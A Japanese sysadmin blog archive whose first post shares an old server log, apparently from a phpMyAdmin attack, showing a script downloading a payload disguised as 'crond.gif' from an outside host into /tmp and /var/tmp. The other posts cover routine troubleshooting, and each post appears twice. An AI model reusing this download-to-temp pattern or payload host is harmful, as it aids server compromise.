技術:2012年
2016年03月26日
昔の記事なのですが、公開されていなかったので、メモ。
本件のログですがおそらく、phpmyadmin の脆弱性を突いた攻撃だと思われます。
※詳細は当時のことなのでよく覚えていませんが・・・
no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 23.0K=0.7s
2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'
0K .......... ..... 100% 22.9K=0.7s
2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]
--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 22.7K=0.7s
2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'
0K .......... ..... 100% 22.6K=0.7s
2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]
本件のログですがおそらく、phpmyadmin の脆弱性を突いた攻撃だと思われます。
※詳細は当時のことなのでよく覚えていませんが・・・
no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 23.0K=0.7s
2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'
0K .......... ..... 100% 22.9K=0.7s
2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]
--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 22.7K=0.7s
2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'
0K .......... ..... 100% 22.6K=0.7s
2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]
2012年12月27日
僕は比較的 QNAP を選定することが多くあります。
しかしQNAPではまだフェイルオーバーができません。
第433回:フェイルオーバー&RAID6でデータをしっかり保護バッファロー「TeraStation PRO TS-QVH4.0TL/R6」
上記記事を読むと、障害発生から5分で切り替わったと言うことでした。
ちょっと時間がかかりすぎるような気がするのは確かですが、すぐに伺ってトラブル対応ができない場合、たった5分のダウンタイムになるというのは大きな意味を持つように思います。
まだ使ったことが無いのですが、何かのタイミングで検証できそうなら試してみたいと思います。
しかしQNAPではまだフェイルオーバーができません。
第433回:フェイルオーバー&RAID6でデータをしっかり保護バッファロー「TeraStation PRO TS-QVH4.0TL/R6」
上記記事を読むと、障害発生から5分で切り替わったと言うことでした。
ちょっと時間がかかりすぎるような気がするのは確かですが、すぐに伺ってトラブル対応ができない場合、たった5分のダウンタイムになるというのは大きな意味を持つように思います。
まだ使ったことが無いのですが、何かのタイミングで検証できそうなら試してみたいと思います。
2012年12月25日
デスクネッツのログを検索しようとすると、過去の集計がされていません。そして設定画面では、赤字で以下の通り表示されていました。
---
アクセスログ集計バッチが以下の理由により停止しました。
データベースの接続に失敗しました。データベースが起動していない可能性があります。
---
昔にデスクネッツのログフォルダを変更しました。その際、既存のフォルダにあったログファイル [acclogging_20XXXXXX_20XXXXXX] もすべて新しいフォルダに移動させました。
しかしどうやらこのときに、acclogging_base.db というファイルも移動してしまったようなのです。
今回のトラブルでわかったことは、acclogging_base.db は移動前フォルダの中身を参照しているような感じがしました。
ProcessMonitor で デスクネッツのログを制御していると思われるプロセス、dndbacclogging.exe を確認したところ、この base ファイルを読み込もうとしてエラーになっていました。
幸いな事にログの取得は過去にさかのぼって保管されていたので、正しい位置にファイルを戻したところ、集計を行ってくれました。
---
アクセスログ集計バッチが以下の理由により停止しました。
データベースの接続に失敗しました。データベースが起動していない可能性があります。
---
昔にデスクネッツのログフォルダを変更しました。その際、既存のフォルダにあったログファイル [acclogging_20XXXXXX_20XXXXXX] もすべて新しいフォルダに移動させました。
しかしどうやらこのときに、acclogging_base.db というファイルも移動してしまったようなのです。
今回のトラブルでわかったことは、acclogging_base.db は移動前フォルダの中身を参照しているような感じがしました。
ProcessMonitor で デスクネッツのログを制御していると思われるプロセス、dndbacclogging.exe を確認したところ、この base ファイルを読み込もうとしてエラーになっていました。
幸いな事にログの取得は過去にさかのぼって保管されていたので、正しい位置にファイルを戻したところ、集計を行ってくれました。
2012年12月23日
FFFTPを利用して、さくらインターネットの共有サーバーに接続します。※細かいプラン名はよくわかりません。
この契約形態のサーバーは、MTなどの比較的多数のファイルをダウン・アップしようとすると、接続が切れてしまうようです。
僕がやったわけでは無いので詳細は分かりませんが、部下に「ちょっとずつじゃないとエラーになってできません」そのように言われました。
調べてみると、FFFTP との相性なのか、切断されてしまったり、フリーズ状態になったりするという症状が出る場合があるようです。
さくらが悪いのかFFFTPが悪いのか
さくらちゃん(※ レンタルサーバ)とFTPソフトの相性
ライト以外のプランであれば、シェルログインができるようです。
上記サイトにあるように、SCPを利用したほうが安定するのかもしれません。
この契約形態のサーバーは、MTなどの比較的多数のファイルをダウン・アップしようとすると、接続が切れてしまうようです。
僕がやったわけでは無いので詳細は分かりませんが、部下に「ちょっとずつじゃないとエラーになってできません」そのように言われました。
調べてみると、FFFTP との相性なのか、切断されてしまったり、フリーズ状態になったりするという症状が出る場合があるようです。
さくらが悪いのかFFFTPが悪いのか
さくらちゃん(※ レンタルサーバ)とFTPソフトの相性
ライト以外のプランであれば、シェルログインができるようです。
上記サイトにあるように、SCPを利用したほうが安定するのかもしれません。
2012年12月21日
grep で特定の文字列が含まれるファイル名だけをリストアップする方法
grep ? ファイルにおけるパターンの検索 - 会津大学UNIXウィキ
そのままですが、上記サイトの通りです。
# egrep -rl 'hoge'
大変勉強になりました。
grep ? ファイルにおけるパターンの検索 - 会津大学UNIXウィキ
そのままですが、上記サイトの通りです。
# egrep -rl 'hoge'
大変勉強になりました。
2012年12月20日
2012年12月19日
Plesk を利用していたら、ある日突然ライセンスのアップデートができなくなりました。
Plesk のライセンス管理から、キーの取得を行うと以下の通りエラーが。
-----------------------
ERROR: PleskFatalException
Unknown key property: concerto
0: common_func.php3:93
psaerror(string 'Unknown key property: concerto')
1: common_func.php3:4831
getKeyProp(string 'concerto')
2: key_update.php:16
-----------------------
調べてみると、Plesk のライセンスは 5224 を利用するようです。ファイアーウォールでふさがっていたようなので、開放しました。
Plesk のライセンス管理から、キーの取得を行うと以下の通りエラーが。
-----------------------
ERROR: PleskFatalException
Unknown key property: concerto
0: common_func.php3:93
psaerror(string 'Unknown key property: concerto')
1: common_func.php3:4831
getKeyProp(string 'concerto')
2: key_update.php:16
-----------------------
調べてみると、Plesk のライセンスは 5224 を利用するようです。ファイアーウォールでふさがっていたようなので、開放しました。